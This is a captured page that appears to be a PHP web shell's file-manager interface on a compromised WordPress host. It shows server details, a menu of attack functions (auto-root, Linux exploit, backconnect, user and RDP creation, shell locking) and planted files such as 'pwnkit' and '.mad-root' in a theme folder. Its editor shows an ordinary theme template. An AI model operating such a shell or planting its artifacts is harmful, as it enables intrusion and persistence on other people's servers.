Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
andre-lite /
[ HOME SHELL ]
Name
Size
Permission
Action
genericons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
404.php
432
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
animate.css
37.64
KB
-rw-r--r--
archive.php
755
B
-rw-r--r--
comments.php
1.92
KB
-rw-r--r--
content.php
519
B
-rw-r--r--
footer.php
903
B
-rw-r--r--
functions.php
4.6
KB
-rw-r--r--
header.php
2.01
KB
-rw-r--r--
index.php
588
B
-rw-r--r--
page.php
922
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.07
KB
-rw-r--r--
screenshot.png
382.22
KB
-rw-r--r--
search.php
792
B
-rw-r--r--
sidebar.php
212
B
-rw-r--r--
single.php
1.36
KB
-rw-r--r--
style-editor.css
3.82
KB
-rw-r--r--
style-rtl.css
40.86
KB
-rw-r--r--
style.css
40.75
KB
-rw-r--r--
template-home-page.php
435
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php /** * The Template for displaying all single posts. * * @package andre */ get_header(); ?> <div id="wrapper"> <div class="innerwrapper"> <div id="contentwrapper" class="content"> <?php while ( have_posts() ) : the_post(); ?> <div <?php post_class(); ?>> <?php if ( has_post_thumbnail() ) : ?> <?php the_post_thumbnail( 'andre-blogthumb' ); ?> <?php endif ?> <div class="entry"> <h1 class="entry-title"><?php the_title(); ?></h1> <div class="postdate"> <?php echo get_the_date(); ?> </div> <?php the_content(); ?> <?php wp_link_pages( array( 'before' => '<p><strong>' . esc_html__( 'Pages:', 'andre-lite' ) . '</strong> ', 'after' => '</p>', 'next_or_number' => 'number', ) ); ?> <?php edit_post_link(); ?> <?php echo wp_kses_post( get_the_tag_list( '<p class="singletags">', ' ', '</p>' ) ); ?> <div class="post-navigation"> <div class="nav-previous"> <?php previous_post_link( '%link' ); ?> </div> <div class="nav-next"> <?php next_post_link( '%link' ); ?> </div> </div> <?php comments_template(); ?> </div> </div> <?php endwhile; // end of the loop. ?> </div> </div> </div> <?php get_footer(); ?>
Close